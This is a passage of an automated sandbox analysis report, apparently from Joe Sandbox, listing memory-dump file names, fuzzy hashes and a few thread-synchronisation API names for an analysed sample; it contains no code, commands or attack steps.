                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_e70000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 2b5a15f00b1526b08bdfa7761f9aaefc192f1e3faa50ca02b85315c4f57f6e6a
                                                                                                                                                                                                                                                  • Instruction ID: a4f7cbe5e78d718a4caf36ee8e9ce84cdf8645c610e74cbcebfc3293908b8fc6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b5a15f00b1526b08bdfa7761f9aaefc192f1e3faa50ca02b85315c4f57f6e6a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84118A23F30C355B675C816D8C172BA95D2DBD825071F533AD866FB284E994DE13D290
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_e70000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 69368e33383e1e94eef2ceab35efabe13634146fb6e6488aa9fcdc9ed388e530
                                                                                                                                                                                                                                                  • Instruction ID: 01b8c2fe161bec9596e6f4d57a6c08045990d0b42fcc003a2acae7b04282d03d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 69368e33383e1e94eef2ceab35efabe13634146fb6e6488aa9fcdc9ed388e530
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7112B7720018283E60C862DDBB45F7A79EEBC53297EC637AD081BB758DA23D945D600
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_e70000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 8bfb7b8e78c370f2913f61a25c6defe040cdd2114a4e27868ad6e7523cb31ccb
                                                                                                                                                                                                                                                  • Instruction ID: 8e4e29927f998fa0ba79020b88d5162ce43ae3b6edccc8ebf7a6225d5afb119b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8bfb7b8e78c370f2913f61a25c6defe040cdd2114a4e27868ad6e7523cb31ccb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01E08C32921228EBCB14DB98C90498EF7FCEB4AB00B6910A6F501E7151C370EE08C7D0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_e70000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 57040152-0
                                                                                                                                                                                                                                                  • Opcode ID: e4b64df65ee7bf863279409f2baa8bed57b514214c2026cedc0023781046d43c
                                                                                                                                                                                                                                                  • Instruction ID: 7b186f85536e223039e2002086f9285c7adeb242705e01b8a84d26c9efad75d3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4b64df65ee7bf863279409f2baa8bed57b514214c2026cedc0023781046d43c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61A1E3B0A016059FDB21EF74C944B9AB7E8FF15318F149169E81DF7281EB31DA04DBA1
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
